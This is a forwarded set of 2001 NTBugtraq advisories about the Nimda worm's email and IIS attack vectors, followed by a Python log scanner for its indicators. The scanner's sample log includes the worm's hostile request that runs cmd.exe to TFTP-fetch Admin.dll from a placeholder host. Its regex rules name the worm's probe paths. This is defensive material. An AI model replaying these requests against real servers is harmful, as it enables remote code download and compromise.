Offtopic

From NTBUGTRAQ:

------------------------
There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following:

edit %systemroot%/system32/drivers/etc/services.

change the line:

tftp 69/udp

to:

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection, so it can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
------------------------
Ok, whoa horsy, I've got lots of copies of ADMIN.DLL now thanks!

Analysis is still on-going to determine precisely what the infecting
files do (there are potentially two, ADMIN.DLL and README.EXE).

Some people have said their boxes seem unstable. It could be because
of numerous copies of TFTP.EXE in memory. At this point it might be
best to disconnect any computer that appears unstable from the
network, until such time as sufficient analysis has been performed to
advise how best to bring the box back on-line.

It is also possible for client machines to perform the attacks that
we're seeing. If you have a way to filter outbound HTTP requests, you
should look for anything that contains "/scripts" or "tftp" in the
URL and treat it as suspicious.

The internal threat by this one is no different (and maybe worse)
than CRII. We've seen indications of WnetEnumResource calls as well
as references to IPC$. There may be NetBIOS share activity associated
with the worm, and if so, it will likely spread rapidly internally.

More than likely you will see the biggest effect in terms of a DoS
(from many source machines). This thing cares not whether you're an
IIS box or not, it tries regardless. As this spreads the effects may
become more severe (no, I'm not going to provide a quote on how
severe). Make sure your inbound (and preferably your outbound)
router rules are restricted to only those protocols that must be
present, and ideally to machine IP addresses that should have access.

More as it becomes available.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
------------------------
Numerous people have reported that on IIS servers infected with
w32.nimda.amm, when visitors browse to their website the visitor is
offered up README.EML, which in turn downloads README.EXE to the
visitor.

Please, check your IIS boxes now to see if you are infected. I've had
reports of IIS servers with more than 10,000 .eml files present
(mostly as a result of nimda).

While we don't have any conclusive disinfecting procedures yet, any
IIS box that has been infected definitely shouldn't be available to
clients until we do.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
------------------------
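As an added illustration of the request filtering Russ describes (this is not code from the original posts), the following Python scans IIS W3C log lines for the probes named above: ROOT.EXE under /scripts and /msadc, CMD.EXE reached via the /c and /d virtual roots, "tftp" anywhere in a URL, and README.EML being served to visitors. The log lines, client addresses and rule names are constructed for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed IIS W3C extended log lines (sample data, not from the advisory):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-09-18 14:02:11 192.0.2.10 GET /index.htm - 200
2001-09-18 14:02:12 192.0.2.77 GET /scripts/root.exe /c+dir 404
2001-09-18 14:02:12 192.0.2.77 GET /msadc/root.exe /c+dir 404
2001-09-18 14:02:13 192.0.2.77 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 14:02:14 192.0.2.77 GET /d/winnt/system32/cmd.exe /c+tftp+-i+203.0.113.5+GET+Admin.dll 200
2001-09-18 14:02:20 192.0.2.10 GET /images/logo.gif - 200
2001-09-18 14:02:25 192.0.2.31 GET /readme.eml - 200
"""

# One rule per indicator named in the advisory, matched case-insensitively
# against the full request URI (stem + "?" + query).
RULES = [
    ("root_exe_backdoor", re.compile(r"^/(scripts|msadc)/root\.exe", re.I)),  # Code Red II leftover
    ("virtual_root_cmd", re.compile(r"^/[cd]/.*cmd\.exe", re.I)),             # /c and /d virtual roots
    ("tftp_in_url", re.compile(r"tftp", re.I)),                                # TFTP fetch of ADMIN.DLL
    ("scripts_dir", re.compile(r"/scripts", re.I)),                            # catch-all from the advisory
    ("readme_eml", re.compile(r"readme\.eml$", re.I)),                         # README.EML served to visitors
]

def parse_line(line):
    """Return (client_ip, request_uri) for one log line, or None for comments/short lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 7:
        return None
    ip, stem, query = parts[2], parts[4], parts[5]
    return ip, (stem if query == "-" else f"{stem}?{query}")

def classify(uri):
    """Names of every rule the request URI triggers (empty list for ordinary traffic)."""
    return [name for name, pattern in RULES if pattern.search(uri)]

def scan(log_text):
    """Rule hits per client IP; a client tripping several rules is probing like the worm."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, uri = parsed
        for name in classify(uri):
            hits[ip][name] += 1
    return {ip: dict(counter) for ip, counter in hits.items()}
```

A readme_eml hit against your own server's log means the server is handing README.EML to visitors, which is the infected-server symptom Russ reports, not just inbound probing.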


-- 
Regards,

Terrence Koeman

Technical Director/Administrator
MediaMonks B.V. (www.mediamonks.nl)

Please quote all replies in correspondence. 
